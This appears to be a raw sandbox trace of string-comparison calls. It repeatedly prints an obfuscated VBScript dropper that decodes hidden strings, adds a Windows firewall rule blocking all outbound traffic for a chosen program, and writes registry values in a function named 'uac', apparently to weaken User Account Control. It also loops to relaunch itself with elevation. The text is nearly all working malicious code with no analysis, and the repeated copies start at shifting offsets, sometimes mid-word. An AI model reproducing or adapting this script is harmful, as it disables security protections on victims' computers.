00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44 [0223.012] wcsncmp (_String1="\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.012] wcsncmp (_String1="Set newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0223.012] wcsncmp (_String1="et newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.013] wcsncmp (_String1="t newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.013] wcsncmp (_String1=" newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 